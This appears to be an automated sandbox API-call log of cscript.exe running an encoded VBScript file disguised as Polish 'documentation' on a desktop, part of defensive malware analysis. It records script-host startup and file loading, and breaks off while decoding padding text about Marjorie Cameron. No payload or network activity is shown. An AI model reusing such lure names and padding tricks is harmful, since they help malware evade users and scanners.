# Flog Txt Version 1 # Analyzer Version: 3.0.1 # Analyzer Build Date: Apr 26 2019 07:34:03 # Log Creation Date: 30.04.2019 10:37:39.605 Process: id = "1" image_name = "cscript.exe" filename = "c:\\windows\\system32\\cscript.exe" page_root = "0x346d2000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb44 [0196.202] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f990 | out: lpSystemTimeAsFileTime=0x28f990*(dwLowDateTime=0x2cccfe00, dwHighDateTime=0x1d4ff41)) [0196.202] GetCurrentProcessId () returned 0xb40 [0196.202] GetCurrentThreadId () returned 0xb44 [0196.202] GetTickCount () returned 0x37de5 [0196.202] QueryPerformanceCounter (in: lpPerformanceCount=0x28f998 | out: lpPerformanceCount=0x28f998*=26965335422) returned 1 [0196.203] GetModuleHandleA (lpModuleName=0x0) returned 0xff910000 [0196.203] GetVersionExA (in: lpVersionInformation=0x28f880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28f880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0196.203] GetUserDefaultLCID () returned 0x409 [0196.204] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e30000 [0196.204] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0196.204] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0196.205] FreeLibrary (hLibModule=0x76e30000) returned 1 [0196.205] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" " [0196.205] lstrlenW (lpString="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" ") returned 86 [0196.206] GetCurrentThreadId () returned 0xb44 [0196.206] CoInitialize (pvReserved=0x0) returned 0x0 [0197.585] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f548 | out: phkResult=0x28f548*=0x88) returned 0x0 [0197.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f540 | out: phkResult=0x28f540*=0x8c) returned 0x0 [0197.585] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2 [0197.586] RegQueryValueExW (in: hKey=0x88, lpValueName="Enabled", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2 [0197.586] RegQueryValueExW (in: hKey=0x8c, lpValueName="Enabled", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2 [0197.586] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0197.594] RegCloseKey (hKey=0x8c) returned 0x0 [0197.594] RegCloseKey (hKey=0x88) returned 0x0 [0197.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f260 | out: phkResult=0x28f260*=0x88) returned 0x0 [0197.594] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f258 | out: phkResult=0x28f258*=0x8c) returned 0x0 [0197.594] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2 [0197.594] RegQueryValueExW (in: hKey=0x88, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2 [0197.594] RegQueryValueExW (in: hKey=0x8c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2 [0197.595] RegCloseKey (hKey=0x8c) returned 0x0 [0197.595] RegCloseKey (hKey=0x88) returned 0x0 [0197.595] GetACP () returned 0x4e4 [0197.595] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e30000 [0197.595] GetProcAddress (hModule=0x76e30000, lpProcName="HeapSetInformation") returned 0x76e4c4a0 [0197.595] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.595] FreeLibrary (hLibModule=0x76e30000) returned 1 [0197.595] ??2@YAPEAX_K@Z () returned 0x45df90 [0197.595] CoRegisterMessageFilter (in: lpMessageFilter=0x45df90, lplpMessageFilter=0x45dfa0 | out: lplpMessageFilter=0x45dfa0*=0x0) returned 0x0 [0197.595] IUnknown:AddRef (This=0x45df90) returned 0x2 [0197.595] GetModuleFileNameW (in: hModule=0xff910000, lpFilename=0x28f5a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0197.595] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x28eef0 | out: lpdwHandle=0x28eef0) returned 0x704 [0197.595] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x28e7e0 | out: lpData=0x28e7e0) returned 1 [0197.595] VerQueryValueW (in: pBlock=0x28e7e0, lpSubBlock="\\", lplpBuffer=0x28eef8, puLen=0x28eef4 | out: lplpBuffer=0x28eef8*=0x28e808, puLen=0x28eef4) returned 1 [0197.595] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ef48 | out: phkResult=0x28ef48*=0x88) returned 0x0 [0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x0, lpData=0x28e6a0*=0x0, lpcbData=0x28e290*=0x400) returned 0x2 [0197.596] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ef00 | out: phkResult=0x28ef00*=0x8c) returned 0x0 [0197.596] RegQueryValueExW (in: hKey=0x8c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x28eec4, lpData=0x28ef40, lpcbData=0x28eec0*=0x4 | out: lpType=0x28eec4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eec0*=0x4) returned 0x2 [0197.596] RegQueryValueExW (in: hKey=0x8c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x0, lpData=0x28e6a0*=0x0, lpcbData=0x28e290*=0x400) returned 0x2 [0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x28eec4, lpData=0x28ef40, lpcbData=0x28eec0*=0x4 | out: lpType=0x28eec4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eec0*=0x4) returned 0x2 [0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x1, lpData="1", lpcbData=0x28e290*=0x4) returned 0x0 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="0") returned 1 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="no") returned 2 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="false") returned 5 [0197.596] RegCloseKey (hKey=0x8c) returned 0x0 [0197.596] RegCloseKey (hKey=0x88) returned 0x0 [0197.596] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x28ef48, lpdwDisposition=0x0 | out: phkResult=0x28ef48*=0x88, lpdwDisposition=0x0) returned 0x0 [0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x28eee4, lpData=0x28ef40, lpcbData=0x28eee0*=0x4 | out: lpType=0x28eee4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eee0*=0x4) returned 0x2 [0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x28e2b8, lpData=0x28e6c0, lpcbData=0x28e2b0*=0x400 | out: lpType=0x28e2b8*=0x1, lpData="1", lpcbData=0x28e2b0*=0x4) returned 0x0 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="0") returned 1 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="no") returned 2 [0197.596] lstrlenW (lpString="1") returned 1 [0197.596] lstrlenW (lpString="false") returned 5 [0197.596] RegCloseKey (hKey=0x88) returned 0x0 [0197.596] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x28ef48, lpdwDisposition=0x0 | out: phkResult=0x28ef48*=0x88, lpdwDisposition=0x0) returned 0x0 [0197.597] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x28eee4, lpData=0x28ef40, lpcbData=0x28eee0*=0x4 | out: lpType=0x28eee4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eee0*=0x4) returned 0x2 [0197.597] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x28e2b8, lpData=0x28e6c0, lpcbData=0x28e2b0*=0x400 | out: lpType=0x28e2b8*=0x0, lpData=0x28e6c0*=0x31, lpcbData=0x28e2b0*=0x400) returned 0x2 [0197.597] RegCloseKey (hKey=0x88) returned 0x0 [0197.597] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe") returned 48 [0197.597] lstrlenW (lpString="vbe") returned 3 [0197.597] lstrlenW (lpString="WSH") returned 3 [0197.597] LoadStringW (in: hInstance=0xff910000, uID=0x834, lpBuffer=0x28de40, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70 [0197.597] FormatMessageW (in: dwFlags=0x500, lpSource=0x37fe58, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x28ee28, nSize=0x0, Arguments=0x28ee98 | out: lpBuffer="\xecc0\x37") returned 0x6a [0197.597] LocalFree (hMem=0x37ecc0) returned 0x0 [0197.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0197.597] lstrlenW (lpString="Microsoft (R) Windows Script Host Version 5.8\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\n") returned 106 [0197.597] GetProcessHeap () returned 0x350000 [0197.597] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0xe8) returned 0x36f350 [0197.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ebf8 | out: lpMode=0x28ebf8) returned 1 [0197.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x36f350*, nNumberOfCharsToWrite=0x6c, lpNumberOfCharsWritten=0x28ebf0, lpReserved=0x0 | out: lpBuffer=0x36f350*, lpNumberOfCharsWritten=0x28ebf0*=0x6c) returned 1 [0197.600] GetProcessHeap () returned 0x350000 [0197.600] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36f350 | out: hHeap=0x350000) returned 1 [0197.600] ??2@YAPEAX_K@Z () returned 0x625f30 [0197.600] LoadStringW (in: hInstance=0xff910000, uID=0x7d1, lpBuffer=0x28d9b0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0197.600] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x28e9f0*=0x0 | out: pptlib=0x28e9f0*=0x37f050) returned 0x0 [0197.714] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff9249b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380438) returned 0x0 [0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380438, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0 [0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380438, hreftype=0xfffffffe, ppTInfo=0xff92d638 | out: ppTInfo=0xff92d638*=0x380490) returned 0x0 [0198.187] IUnknown:Release (This=0x380438) returned 0x1 [0198.187] ??2@YAPEAX_K@Z () returned 0x6257b0 [0198.187] ??2@YAPEAX_K@Z () returned 0x625850 [0198.187] ??2@YAPEAX_K@Z () returned 0x6258b0 [0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x3804e8) returned 0x0 [0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x3804e8, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0 [0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x3804e8, hreftype=0xfffffffe, ppTInfo=0xff92d6b8 | out: ppTInfo=0xff92d6b8*=0x380540) returned 0x0 [0198.187] IUnknown:Release (This=0x3804e8) returned 0x1 [0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380598) returned 0x0 [0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380598, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0 [0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380598, hreftype=0xfffffffe, ppTInfo=0xff92d6f8 | out: ppTInfo=0xff92d6f8*=0x3805f0) returned 0x0 [0198.187] IUnknown:Release (This=0x380598) returned 0x1 [0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380648) returned 0x0 [0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380648, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0 [0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380648, hreftype=0xfffffffe, ppTInfo=0xff92d678 | out: ppTInfo=0xff92d678*=0x3806a0) returned 0x0 [0198.187] IUnknown:Release (This=0x380648) returned 0x1 [0198.187] IUnknown:Release (This=0x37f050) returned 0x4 [0198.187] ??2@YAPEAX_K@Z () returned 0x625910 [0198.187] GetCurrentThreadId () returned 0xb44 [0198.187] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8 [0198.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff9123e8, lpParameter=0x625910, dwCreationFlags=0x0, lpThreadId=0x625938 | out: lpThreadId=0x625938*=0xb5c) returned 0xe0 [0198.188] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x28ec30*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0198.667] CloseHandle (hObject=0xd8) returned 1 [0198.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe", nBufferLength=0x104, lpBuffer=0x28ecc0, lpFilePart=0x28ecb0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe", lpFilePart=0x28ecb0*="dokumentacja_92622.vbe") returned 0x30 [0198.668] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbe", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e1d0 | out: phkResult=0x28e1d0*=0xf2) returned 0x0 [0198.670] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x28e180, lpData=0x28e1e0, lpcbData=0x28e184*=0x800 | out: lpType=0x28e180*=0x1, lpData="VBEFile", lpcbData=0x28e184*=0x10) returned 0x0 [0198.670] RegCloseKey (hKey=0xf2) returned 0x0 [0198.670] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBEFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e1d0 | out: phkResult=0x28e1d0*=0xf2) returned 0x0 [0198.670] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x28e180, lpData=0x28ea50, lpcbData=0x28e184*=0x200 | out: lpType=0x28e180*=0x1, lpData="VBScript.Encode", lpcbData=0x28e184*=0x20) returned 0x0 [0198.670] RegCloseKey (hKey=0xf2) returned 0x0 [0198.670] ??2@YAPEAX_K@Z () returned 0x6262b0 [0198.671] GetProcessHeap () returned 0x350000 [0198.671] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x2000) returned 0x38b2b0 [0198.671] CLSIDFromString (in: lpsz="VBScript.Encode", pclsid=0x28e9c8 | out: pclsid=0x28e9c8*(Data1=0xb54f3743, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0198.671] CoCreateInstance (in: rclsid=0x28e9c8*(Data1=0xb54f3743, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff924828*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28e9c0 | out: ppv=0x28e9c0*=0x626580) returned 0x0 [0199.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28cbc0 | out: lpSystemTimeAsFileTime=0x28cbc0*(dwLowDateTime=0x2d48c580, dwHighDateTime=0x1d4ff41)) [0199.928] GetCurrentProcessId () returned 0xb40 [0199.928] GetCurrentThreadId () returned 0xb44 [0199.928] GetTickCount () returned 0x38111 [0199.928] QueryPerformanceCounter (in: lpPerformanceCount=0x28cbc8 | out: lpPerformanceCount=0x28cbc8*=27337877894) returned 1 [0199.928] malloc (_Size=0x100) returned 0x626470 [0199.928] __dllonexit () returned 0x7fef878bfc0 [0199.928] __dllonexit () returned 0x7fef878bfa8 [0199.995] __dllonexit () returned 0x7fef878bfd4 [0200.083] GetUserDefaultLCID () returned 0x409 [0200.084] GetVersion () returned 0x1db10106 [0200.086] ??2@YAPEAX_K@Z () returned 0x625a60 [0200.087] ??2@YAPEAX_K@Z () returned 0x626580 [0200.168] GetUserDefaultLCID () returned 0x409 [0200.168] GetACP () returned 0x4e4 [0200.169] ??3@YAXPEAX@Z () returned 0x721ee701 [0200.169] GetCurrentThreadId () returned 0xb44 [0200.169] ??2@YAPEAX_K@Z () returned 0x626910 [0200.169] GetCurrentThreadId () returned 0xb44 [0200.169] ??2@YAPEAX_K@Z () returned 0x625a60 [0200.169] ??2@YAPEAX_K@Z () returned 0x625a90 [0200.169] ??2@YAPEAX_K@Z () returned 0x6269f0 [0200.169] ??2@YAPEAX_K@Z () returned 0x626ac0 [0200.169] GetCurrentThreadId () returned 0xb44 [0200.169] ??2@YAPEAX_K@Z () returned 0x626b00 [0200.170] GetUserDefaultLCID () returned 0x409 [0200.170] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0200.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x28e920, cchData=6 | out: lpLCData="1252") returned 5 [0200.170] IsValidCodePage (CodePage=0x4e4) returned 1 [0200.170] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe2b0000 [0200.231] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoCreateInstance") returned 0x7fefe2d7490 [0200.231] CoCreateInstance (in: rclsid=0x7fef87dd5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef87dd5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x6268c8 | out: ppv=0x6268c8*=0x38f750) returned 0x0 [0200.231] IUnknown:AddRef (This=0x38f750) returned 0x2 [0200.231] GetCurrentProcessId () returned 0xb40 [0200.231] GetCurrentThreadId () returned 0xb44 [0200.232] GetTickCount () returned 0x38249 [0200.232] ISystemDebugEventFire:BeginSession (This=0x38f750, guidSourceID=0x7fef87dd5d8, strSessionName="VBScript:00002880:00002884:18229961") returned 0x0 [0200.232] GetCurrentThreadId () returned 0xb44 [0200.232] ??2@YAPEAX_K@Z () returned 0x626b90 [0200.232] ??2@YAPEAX_K@Z () returned 0x626be0 [0200.232] malloc (_Size=0x80) returned 0x626ce0 [0200.232] malloc (_Size=0x108) returned 0x626d70 [0200.232] GetCurrentThreadId () returned 0xb44 [0200.232] ??2@YAPEAX_K@Z () returned 0x626e80 [0200.232] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe" (normalized: "c:\\users\\5p5nrg~1\\desktop\\dokumentacja_92622.vbe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x10c [0200.232] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c87 [0200.232] CreateFileMappingA (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c87, lpName=0x0) returned 0x110 [0200.232] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x140000 [0200.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=7303, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7303 [0200.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=7303, lpWideCharStr=0x392568, cchWideChar=7303 | out: lpWideCharStr="\x27\x4d\x61\x72\x6a\x6f\x72\x69\x65\x20\x43\x61\x6d\x65\x72\x6f\x6e\x20\x28\x41\x70\x72\x69\x6c\x20\x32\x33\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x2c\x20\x70\x6f\x65\x74\x2c\x20\x61\x63\x74\x72\x65\x73\x73\x2c\x20\x61\x6e\x64\x20\x6f\x63\x63\x75\x6c\x74\x69\x73\x74\x2e\x20\x41\x66\x74\x65\x72\x20\x73\x65\x72\x76\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\x20\x6e\x61\x76\x79\x20\x64\x75\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x53\x65\x63\x6f\x6e\x64\x20\x57\x6f\x72\x6c\x64\x20\x57\x61\x72\x2c\x20\x0d\x0a\x27\x73\x68\x65\x20\x73\x65\x74\x74\x6c\x65\x64\x20\x69\x6e\x20\x50\x61\x73\x61\x64\x65\x6e\x61\x2c\x20\x43\x61\x6c\x69\x66\x6f\x72\x6e\x69\x61\x2e\x20\x54\x68\x65\x72\x65\x20\x73\x68\x65\x20\x6d\x65\x74\x20\x74\x68\x65\x20\x72\x6f\x63\x6b\x65\x74\x20\x70\x69\x6f\x6e\x65\x65\x72\x20\x4a\x61\x63\x6b\x20\x50\x61\x72\x73\x6f\x6e\x73\x2c\x20\x77\x68\x6f\x6d\x20\x73\x68\x65\x20\x6d\x61\x72\x72\x69\x65\x64\x20\x69\x6e\x20\x31\x39\x34\x36\x2e\x20\x41\x66\x74\x65\x72\x20\x50\x61\x72\x73\x6f\x6e\x73\x27\x20\x64\x65\x61\x74\x68\x20\x69\x6e\x20\x61\x6e\x20\x65\x78\x70\x6c\x6f\x73\x69\x6f\x6e\x20\x61\x74\x20\x74\x68\x65\x69\x72\x20\x68\x6f\x6d\x65\x20\x69\x6e\x20\x31\x39\x35\x32\x2c\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x20\x63\x61\x6d\x65\x20\x74\x6f\x20\x73\x75\x73\x70\x65\x63\x74\x20\x74\x68\x61\x74\x20\x68\x65\x72\x20\x68\x75\x73\x62\x61\x6e\x64\x20\x68\x61\x64\x20\x62\x65\x65\x6e\x20\x61\x73\x73\x61\x73\x73\x69\x6e\x61\x74\x65\x64\x2c\x20\x61\x6e\x64\x20\x62\x65\x67\x61\x6e\x20\x72\x69\x74\x75\x61\x6c\x73\x20\x74\x6f\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x63\x61\x74\x65\x20\x77\x69\x74\x68\x20\x68\x69\x73\x20\x73\x70\x69\x72\x69\x74\x2e\x20\x53\x68\x65\x20\x77\x61\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x20\x74\x68\x65\x20\x61\x76\x61\x6e\x74\x2d\x67\x61\x72\x64\x65\x20\x61\x72\x74\x69\x73\x74\x69\x63\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x20\x6f\x66\x20\x4c\x6f\x73\x20\x41\x6e\x67\x65\x6c\x65\x73\x3b\x20\x0d\x0a\x27\x61\x6d\x6f\x6e\x67\x20\x68\x65\x72\x20\x66\x72\x69\x65\